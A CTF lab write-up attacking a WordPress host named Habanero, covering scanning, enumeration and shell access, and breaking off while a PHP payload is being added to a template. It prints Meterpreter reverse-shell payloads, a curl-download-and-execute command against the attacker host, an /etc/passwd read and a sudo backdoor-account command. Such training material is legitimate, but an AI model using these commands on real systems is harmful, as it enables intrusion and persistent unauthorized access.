As mentioned in my previous article, our first internal CTF included an offensive security category called Kaos Corp. Since there are multiple hosts in the environment, it’s better to break it into a series. In this article, we will concentrate on the host with a DNS name of Habanero.
- Rules of Engagement and Scope
- Host discovery
- Port scanning
- More scanning
- Web directory enumeration
- Browsing the site
- Poking around
- More exploits
- Accessing MySQL
- Ransomware key
- Final thoughts
You are a security lead at a renowned University directly supporting the prestigious Scoville Lab. It is a research institute focused on leveraging unprecedented biotechnology techniques to advance the use of capsaicin (8-methyl-N-vanillyl-6-nonenamide) for medical and industrial applications.
The Scoville Lab intellectual property is valuable, and the scientists within this facility have a history of covert operations and sparse documentation. To further isolate their operations, the lab infrastructure is within a private network (172.20.20.0/24). To help separate their network from the main campus, they are behind a firewall.
Leverage OSINT (open-source intelligence) to find the attacker’s method and offensively engage the lab infrastructure to regain administrative control.
- Target 3 to 4 hosts.
- Locate the ransomware encryption key, which credible intelligence suggests they transmitted from one of the Linux servers within the network.
- Engage the Scoville Active Directory Domain Controller and locate the critical research data.
- Decrypt the VeraCrypt Vault containing the research data.
Rules of Engagement and Scope
- Ensure to only practice offensive techniques in sanctioned environments.
- You have explicit permission to engage any host within the IP range 172.20.20.2-172.20.20.100. DO NOT ENGAGE ANY TARGETS OUTSIDE OF THIS SCOPE.
Since we don’t have any information about the hosts, our first approach is to perform host discovery. Discovering targets on the network is the initial step in the reconnaissance stage. Typically, I use a ping sweep tool. However, this may not be applicable in today’s environment since modern operating systems have host-based firewalls enabled by default.
My preferred ping sweep tool is fping instead of Nmap. As mentioned in one of my articles, I came across
fping first before learning about the
nmap -sn command. Furthermore, I’ve seen two different results when performing both of them. The fping had more hosts discovered than the Nmap. It isn’t always the case, however.
andrew@kali:~$ fping -ga 172.20.20.2 172.20.20.100 2> /dev/null 172.20.20.22 172.20.20.24 172.20.20.35 172.20.20.37
Now that we have our target hosts, we can now continue our network reconnaissance. Since this is a series of articles, let’s concentrate on one host at a time. For our first target, let’s start with the 172.20.20.22 host.
Since we have explicit permission to attack the hosts that fall in the scope, let’s use the
-A option, which performs OS and version detection, script scanning, and traceroute. Before performing script scanning, make sure you are authorized to run it on your real-world engagements, as this may violate the contract. The
-p- option will scan ports from 1 to 65535.
nmap -A -p- 172.20.20.22 -T4
andrew@kali:~$ nmap -A -p- 172.20.20.22 -T4 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-11 20:23 PDT Nmap scan report for 172.20.20.22 Host is up (0.030s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 80:ba:c4:f9:0a:b7:3f:0f:09:e5:14:82:c4:e6:91:59 (RSA) | 256 59:38:b6:f0:c0:9e:49:81:1f:f7:86:c2:62:d3:7d:a9 (ECDSA) |_ 256 36:0b:d2:2e:cc:21:ee:45:17:ee:0d:a1:f8:e5:88:c0 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: WordPress 4.9.15 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Scoville Lab Intranet – Spicy Research in the Public Int... 10000/tcp open http MiniServ 1.910 (Webmin httpd) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Login to Webmin Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 100.02 seconds
Since WordPress is famous for having security vulnerabilities, let’s perform a scan to view all the installed plugins and themes and their vulnerabilities, if there are any. The one I know of that can perform this task is WPScan.
By default, Kali should have this installed. If not, it’s easy to install by issuing the
sudo apt install wpscan command.
While the tool is free, they have API plans, which allow you to run WPScan and show the security vulnerabilities on the CLI output. Using the API token saves time. Without the API token argument, it won’t include the security vulnerabilities tied to the core software, plugins, etc.
They have a free tier, but it is limited to 25 API calls per day. For a small site, this may be enough. For a WordPress site with multiple plugins, etc., then the free tier may not be enough. If that’s the case, you can pay for a whole month to increase the limit.
Alternatively, we can run it without the API command argument and visit their website to check for vulnerabilities associated with the plugins, themes, etc.
wpscan –url http://172.20.20.22 –api-token API-TOKEN-HERE
andrew@kali:~$ wpscan --url http://172.20.20.22 --api-token API-TOKEN-HERE _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.17 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://172.20.20.22/ [172.20.20.22] [+] Started: Thu Jun 11 23:28:03 2021 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://172.20.20.22/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://172.20.20.22/xmlrpc.php | Found By: Link Tag (Passive Detection) | Confidence: 100% | Confirmed By: Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://172.20.20.22/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://172.20.20.22/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://172.20.20.22/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.9.15 identified (Insecure, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://172.20.20.22/feed/, https://wordpress.org/?v=4.9.15 | - http://172.20.20.22/comments/feed/, https://wordpress.org/?v=4.9.15 | | [!] 2 vulnerabilities identified: | | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure | Fixed in: 4.9.17 | References: | - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450 | - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/ | - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq | - https://core.trac.wordpress.org/changeset/50717/ | - https://www.youtube.com/watch?v=J2GXmxAdNWs | | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer | Fixed in: 4.9.18 | References: | - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296 | - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62 | - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/ | - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9 | - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/ | - https://www.youtube.com/watch?v=HaW15aMzBUM [+] WordPress theme in use: twentyfifteen | Location: http://172.20.20.22/wp-content/themes/twentyfifteen/ | Last Updated: 2021-03-09T00:00:00.000Z | Readme: http://172.20.20.22/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 2.9 | Style URL: http://172.20.20.22/wp-content/themes/twentyfifteen/style.css?ver=4.9.15 | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Css Style In 404 Page (Passive Detection) | | Version: 1.9 (80% confidence) | Found By: Style (Passive Detection) | - http://172.20.20.22/wp-content/themes/twentyfifteen/style.css?ver=4.9.15, Match: 'Version: 1.9' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] photo-gallery | Location: http://172.20.20.22/wp-content/plugins/photo-gallery/ | Last Updated: 2021-05-17T09:26:00.000Z | [!] The version is out of date, the latest version is 1.5.75 | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Urls In 404 Page (Passive Detection) | | [!] 14 vulnerabilities identified: | | [!] Title: Photo Gallery by WD <= 1.3.35 - Authenticated SQL Injection | Fixed in: 1.3.36 | References: | - https://wpscan.com/vulnerability/7ee790bd-84fb-4625-a308-da5d50677589 | - https://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf | | [!] Title: Photo Gallery by WD <= 1.3.42 - Authenticated Path Traversal | Fixed in: 1.3.43 | References: | - https://wpscan.com/vulnerability/77790dc5-1cd1-461a-b14a-20c67b3ffb5f | - https://advisories.dxw.com/advisories/path-traversal-in-photo-gallery-may-allow-admins-to-read-most-files-on-the-filesystem/ | - https://plugins.trac.wordpress.org/changeset/1667128/photo-gallery | | [!] Title: Photo Gallery by WD <= 1.3.50 - Authenticated SQL Injection | Fixed in: 1.3.51 | References: | - https://wpscan.com/vulnerability/f0a9861c-e9f8-4e8d-aee7-e1cf72f51077 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12977 | - https://github.com/jgj212/Advisories/blob/master/photo-gallery.1.3.50-SQL | - https://plugins.trac.wordpress.org/changeset/1712095/photo-gallery | | [!] Title: Photo Gallery by WD <= 1.3.66 - Cross-Site Scripting (XSS) | Fixed in: 1.3.67 | References: | - https://wpscan.com/vulnerability/a320f45c-e25b-48d4-8f86-febf7b789b3b | - https://plugins.trac.wordpress.org/changeset/1787251/photo-gallery | | [!] Title: Photo Gallery by 10Web <= 1.5.24 - Authenticated LFI | Fixed in: 1.5.25 | References: | - https://wpscan.com/vulnerability/bb01dd50-72fe-4e43-9d79-122937a9b39c | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14798 | - https://plugins.trac.wordpress.org/changeset?reponame=&new=2088371%40photo-gallery&old=2087556%40photo-gallery | | [!] Title: Photo Gallery by 10Web <= 1.5.22 - Authenticated XSS | Fixed in: 1.5.23 | References: | - https://wpscan.com/vulnerability/0abaa335-6847-4d56-ac39-69a05157bb70 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14797 | - https://plugins.trac.wordpress.org/changeset?reponame=&new=2087021%40photo-gallery&old=2085993%40photo-gallery | | [!] Title: Photo Gallery by 10Web <= 1.5.30 - SQL Injection | Fixed in: 1.5.31 | References: | - https://wpscan.com/vulnerability/9d64f953-76a7-4aca-ab7b-2e2704b96642 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14313 | - https://fortiguard.com/zeroday/FG-VD-19-101 | - https://www.fortinet.com/blog/threat-research/wordpress-plugin-sql-injection-vulnerability.html | | [!] Title: Photo Gallery by 10Web < 1.5.35 - SQL Injection & XSS | Fixed in: 1.5.35 | References: | - https://wpscan.com/vulnerability/9875076d-e84e-4deb-a3d3-06d877b41085 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119 | | [!] Title: Photo Gallery < 1.5.46 - Multiple Cross-Site Scripting (XSS) Issues | Fixed in: 1.5.46 | References: | - https://wpscan.com/vulnerability/f626f6f7-6b90-403c-a135-37ca4d9c53e6 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9335 | - https://fortiguard.com/zeroday/FG-VD-20-033 | | [!] Title: Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection | Fixed in: 1.5.55 | References: | - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24139 | - https://plugins.trac.wordpress.org/changeset/2304193 | | [!] Title: Photo Gallery by 10Web < 1.5.68 - Reflected Cross-Site Scripting (XSS) | Fixed in: 1.5.68 | References: | - https://wpscan.com/vulnerability/32aee3ea-e0af-44da-a16c-102c83eaed8f | - https://plugins.trac.wordpress.org/changeset/2467205 | - https://packetstormsecurity.com/files/162227/ | | [!] Title: Photo Gallery by 10web < 1.5.69 - Reflected Cross-Site Scripting (XSS) | Fixed in: 1.5.69 | References: | - https://wpscan.com/vulnerability/6e5f0e04-36c0-4fb6-8194-fe32c15cb3b5 | - https://plugins.trac.wordpress.org/changeset/2476338 | | [!] Title: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) | Fixed in: 1.5.69 | References: | - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24291 | - https://packetstormsecurity.com/files/162227/ | | [!] Title: Photo Gallery < 1.5.67 - Authenticated Stored Cross-Site Scripting via Gallery Title | Fixed in: 1.5.67 | References: | - https://wpscan.com/vulnerability/f34096ec-b1b0-471d-88a4-4699178a3165 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24310 | | Version: 1.2.50 (100% confidence) | Found By: Query Parameter (Passive Detection) | - http://172.20.20.22/wp-content/plugins/photo-gallery/css/bwg_frontend.css?ver=1.2.50 | - http://172.20.20.22/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.css?ver=1.2.50 | - http://172.20.20.22/wp-content/plugins/photo-gallery/js/bwg_frontend.js?ver=1.2.50 | - http://172.20.20.22/wp-content/plugins/photo-gallery/js/jquery.mobile.js?ver=1.2.50 | - http://172.20.20.22/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.2.50 | - http://172.20.20.22/wp-content/plugins/photo-gallery/js/bwg_gallery_box.js?ver=1.2.50 | Confirmed By: | Readme - Stable Tag (Aggressive Detection) | - http://172.20.20.22/wp-content/plugins/photo-gallery/readme.txt | Readme - ChangeLog Section (Aggressive Detection) | - http://172.20.20.22/wp-content/plugins/photo-gallery/readme.txt [+] social-warfare | Location: http://172.20.20.22/wp-content/plugins/social-warfare/ | Last Updated: 2021-05-17T19:38:00.000Z | [!] The version is out of date, the latest version is 4.2.1 | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: | Urls In 404 Page (Passive Detection) | Comment (Passive Detection) | | [!] 2 vulnerabilities identified: | | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update | Fixed in: 3.5.3 | References: | - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978 | - https://wordpress.org/support/topic/malware-into-new-update/ | - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/ | - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/ | - https://twitter.com/warfareplugins/status/1108826025188909057 | - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/ | | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE) | Fixed in: 3.5.3 | References: | - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618 | - https://www.webarxsecurity.com/social-warfare-vulnerability/ | | Version: 3.5.0 (100% confidence) | Found By: Comment (Passive Detection) | - http://172.20.20.22/, Match: 'Social Warfare v3.5.0' | Confirmed By: | Query Parameter (Passive Detection) | - http://172.20.20.22/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0 | - http://172.20.20.22/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0 | Readme - Stable Tag (Aggressive Detection) | - http://172.20.20.22/wp-content/plugins/social-warfare/readme.txt | Readme - ChangeLog Section (Aggressive Detection) | - http://172.20.20.22/wp-content/plugins/social-warfare/readme.txt [+] wp-spritz | Location: http://172.20.20.22/wp-content/plugins/wp-spritz/ | Latest Version: 1.0 (up to date) | Last Updated: 2015-02-01T12:02:00.000Z | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Urls In 404 Page (Passive Detection) | | Version: 4.1 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://172.20.20.22/wp-content/plugins/wp-spritz/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:02 <========================================> (137 / 137) 100.00% Time: 00:00:02 [i] No Config Backups Found. [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 5 | Requests Remaining: 20 [+] Finished: Thu Jun 11 23:28:11 2021 [+] Requests Done: 179 [+] Cached Requests: 11 [+] Data Sent: 44.779 KB [+] Data Received: 263.055 KB [+] Memory used: 202.277 MB [+] Elapsed time: 00:00:08
The tool provided us with great information about the security vulnerabilities that we can exploit. The one that caught my eye is the unauthenticated remote code execution (RCE) under the social-warfare plugin. We can use this later when we start attacking.
Web directory enumeration
Attackers typically perform web directory enumeration to find hidden files and directories. There are two methods in performing web directory enumeration: brute force and dictionary-based. The most common method is dictionary-based since it’s time-consuming to perform brute force.
Many tools can perform web directory enumeration, such as DIRB, Gobuster, DirBuster, etc. I first learned about DIRB but quickly realized that it’s slow. The DirBuster is faster because it’s multi-threaded, but it is a GUI-based tool, and I prefer CLI-based tools. Then, I learned about Gobuster and noticed it could enumerate quicker than DIRB, so I use that now.
gobuster dir -u http://172.20.20.22 -w /usr/share/wordlists/dirb/common.txt
andrew@kali:~$ gobuster dir -u http://172.20.20.22 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://172.20.20.22 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/06/12 22:23:35 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /0 (Status: 301) [Size: 0] [--> http://172.20.20.22/] /admin (Status: 302) [Size: 0] [--> http://172.20.20.22/wp-admin/] /atom (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/atom/] /B (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/] /b (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/] /bl (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/] /Blog (Status: 301) [Size: 0] [--> http://172.20.20.22/Blog/] /blog (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/] /coffee (Status: 301) [Size: 0] [--> http://172.20.20.22/coffee/] /comment-page-1 (Status: 301) [Size: 0] [--> http://172.20.20.22/] /dashboard (Status: 302) [Size: 0] [--> http://172.20.20.22/wp-admin/] /embed (Status: 301) [Size: 0] [--> http://172.20.20.22/] /favicon.ico (Status: 200) [Size: 0] /feed (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/] /h (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/13/hello-world/] /H (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/13/hello-world/] /hello (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/13/hello-world/] /home (Status: 301) [Size: 0] [--> http://172.20.20.22/] /Home (Status: 301) [Size: 0] [--> http://172.20.20.22/] /index.php (Status: 301) [Size: 0] [--> http://172.20.20.22/] /login (Status: 302) [Size: 0] [--> http://172.20.20.22/wp-login.php] /page2 (Status: 301) [Size: 0] [--> http://172.20.20.22/page/2/] /page1 (Status: 301) [Size: 0] [--> http://172.20.20.22/] /rdf (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/rdf/] /robots.txt (Status: 200) [Size: 67] /rss (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/] /rss2 (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/] /server-status (Status: 403) [Size: 277] /W (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/] /w (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/] /word (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/] /wordpress (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/] /wp-admin (Status: 301) [Size: 315] [--> http://172.20.20.22/wp-admin/] /wp-content (Status: 301) [Size: 317] [--> http://172.20.20.22/wp-content/] /wp-includes (Status: 301) [Size: 318] [--> http://172.20.20.22/wp-includes/] /xmlrpc.php (Status: 405) [Size: 42] =============================================================== 2021/06/12 22:25:37 Finished ===============================================================
Browsing the site
The main page doesn’t offer much from a visitor or attacker’s point of view. One of the things I learned from achieving eJPT and participating in CTFs is to view the page source to glean information. Skimming through the page source doesn’t have much, so let’s move on to other pages we found.
Looking through our Gobuster enumeration results, the next interesting one to me is the blog page. My site has a blog page, so I know that a collection of posts is usually there. That said, let’s visit the site and see if we can find something there.
I hope having credentials in plain sight is not something pen testers see every day in their professional lives. But I wouldn’t be surprised if they see it from time to time. Let’s try it out and see if it’s a valid account.
It looks like the login credentials work, and we have an administrator role! We can use this in the exploitation stage.
WordPress allows some roles to create posts and pages. Some of these posts and pages are hidden from the public because it’s still in a draft or only authorized users have access. That said, it’s worth looking at what is in them.
Looking at the Exploit DB site, I saw that Webmin 1.910 has a security vulnerability that we can also exploit. As mentioned in the CVE, it requires any user authorized to the “Package Updates” module to exploit the vulnerability. Since we have one, we can use that to exploit the vulnerability.
With the Webmin and WordPress credentials, and the unauthenticated RCE, it looks promising that we can take the control back and remediate the vulnerabilities.
Unauthenticated RCE Method
From an attacker’s perspective, this is an excellent attack vector because there is no need for login credentials. However, it is challenging to read the command output on the web, as you can see below.
As stated on the WPScan page, it is easy to exploit the plugin’s vulnerability. We need to create a payload file, point to the attacker’s web server, and the output will show up on the page.
Creating the file is easy. Just launch our favorite editor and type
<pre>system('cat /etc/passwd')</pre>, then save and exit.
Launching a web server is easy on Kali since it has Python already installed. You may ask, why Python? Well, it has a built-in HTTP server module that is easy to use. Since Kali has two Python versions installed, we can pick either one.
To use the HTTP server module of Python 2, issue the command as shown below.
andrew@kali:~$ sudo python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
To use the HTTP server module of Python 3, issue the command as shown below.
andrew@kali:~$ sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Once the HTTP server module is up and running, enter the URL as shown below.
While this is useable, it’s not very ideal to use. What we can do is create a reverse shell.
This particular host doesn’t have netcat installed. Unfortunately, it also doesn’t have access to the Internet to download it. That said, we have to find another way to create a reverse shell.
One of the things I learned from eJPT is the use of Metasploit. While I’ve used this in the past, I still learned a few things from the journey. One of them is generating a payload to where we can create a reverse shell.
To generate a Linux-based stageless Meterpreter reverse shell payload, use MSFvenom, as shown below. Note, there are many payloads available in Metasploit.
andrew@kali:~$ msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=10.10.10.2 lport=4444 -f elf > rshell [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 1106216 bytes Final size of elf file: 1106216 bytes
Once we generated the payload, let’s launch the MSFConsole, and prepare for the reverse shell connection.
andrew@kali:~$ msfconsole -q msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp payload => linux/x86/meterpreter_reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.10.2:4444
Upload the Meterpreter payload
Now, we’re ready to upload and run the payload on the Habanero host. Using the same method earlier, use the following syntax to upload and run the executable.
<pre>system('curl http://10.10.10.2/rshell -o /tmp/r; ls -l /tmp/r; chmod 777 /tmp/r; /tmp/r')</pre>
If we go back to our MSFConsole, you should now see a Meterpreter session opened. From the Meterpreter, we can switch to a simple shell by issuing the command as shown below.
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.10.2:4444 [*] Meterpreter session 3 opened (10.10.10.2:4444 -> 172.20.20.22:58052) at 2021-06-12 19:00:17 -0700 meterpreter > shell Process 22046 created. Channel 1 created. whoami administrator id uid=0(root) gid=0(root) groups=0(root)
To upgrade to a fully interactive shell, we can issue the command below. There are other ways, but this one worked just fine, so we’ll leave it alone.
sudo bash -i bash: cannot set terminal process group (20044): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu-00:/var/www/wordpress/wp-admin#
Since we now have root access, we can change passwords and remove users. Though, if we don’t remediate the vulnerabilities, Kaos Corp can still gain access. That said, we need to make sure that we remediate all of the vulnerabilities first before making changes.
Fastest and easiest
While that was a good exercise, there is one fastest and easiest way to get a shell. That is, to create a new account and make it a sudoer.
<pre>system('sudo useradd --shell /bin/bash andrew; echo andrew:password | sudo chpasswd; sudo usermod -aG sudo andrew')</pre>
If we did everything right, we should be able to SSH to the host using the login credentials we set in our syntax above.
andrew@kali:~$ ssh firstname.lastname@example.org email@example.com's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Oct 22 21:46:07 UTC 2020 System load: 0.0 Processes: 110 Usage of /: 28.3% of 19.56GB Users logged in: 1 Memory usage: 16% IP address for ens18: 172.20.20.22 Swap usage: 0% * Introducing autonomous high availability clustering for MicroK8s production environments! Super simple clustering, hardened Kubernetes, with automatic data store operations. A zero-ops HA K8s for anywhere. https://microk8s.io/high-availability * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 20 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings *** System restart required *** Last login: Thu Oct 22 21:39:03 2020 from 10.10.10.2 andrew@ubuntu-00:~$
Since we have valid WordPress login credentials and an administrator role, we can abuse this access to get a shell. There are two ways that I know of to accomplish this. We’ll try both of them to see if they’re effective.
With our valid credentials, we can attempt to use MSFConsole to upload a web shell. This particular module doesn’t always work because it depends on the target host’s configuration.
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
andrew@kali:~$ msfconsole -q msf6 > use exploit/unix/webapp/wp_admin_shell_upload [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password guest password => guest msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username guest username => guest msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 172.20.20.22 rhost => 172.20.20.22 msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit(unix/webapp/wp_admin_shell_upload) > run [*] Started reverse TCP handler on 192.168.8.229:4444 [*] Authenticating with WordPress using guest:guest... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wp-content/plugins/qetTfmULlg/MhxlHLNMNd.php... [!] This exploit may require manual cleanup of 'MhxlHLNMNd.php' on the target [!] This exploit may require manual cleanup of 'qetTfmULlg.php' on the target [!] This exploit may require manual cleanup of '../qetTfmULlg' on the target [*] Exploit completed, but no session was created.
Unfortunately, this module doesn’t work for this target. We have to find another way to upload a reverse shell.
Using the MSFvenom, we can generate a PHP-based payload that we can upload to our target. The step is similar to the section above.
andrew@kali:~$ msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.10.2 lport=4444 -f raw > phpshell [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 34277 bytes
Once generated, we can now prepare our machine to accept connections from our target host. Same as before, we will use MSFConsole for this step.
msf6 > use exploit/multi/handler
andrew@kali:~$ msfconsole -q msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp payload => php/meterpreter_reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.10.2:4444
Now, let’s view and copy the payload’s content to the clipboard and append them to one of the PHP files on the top. Once copied, let’s log into the WordPress site and go to the Appearance > Editor > 404 Template (404.php) file. From there, append the payload’s content to the top part of the file.
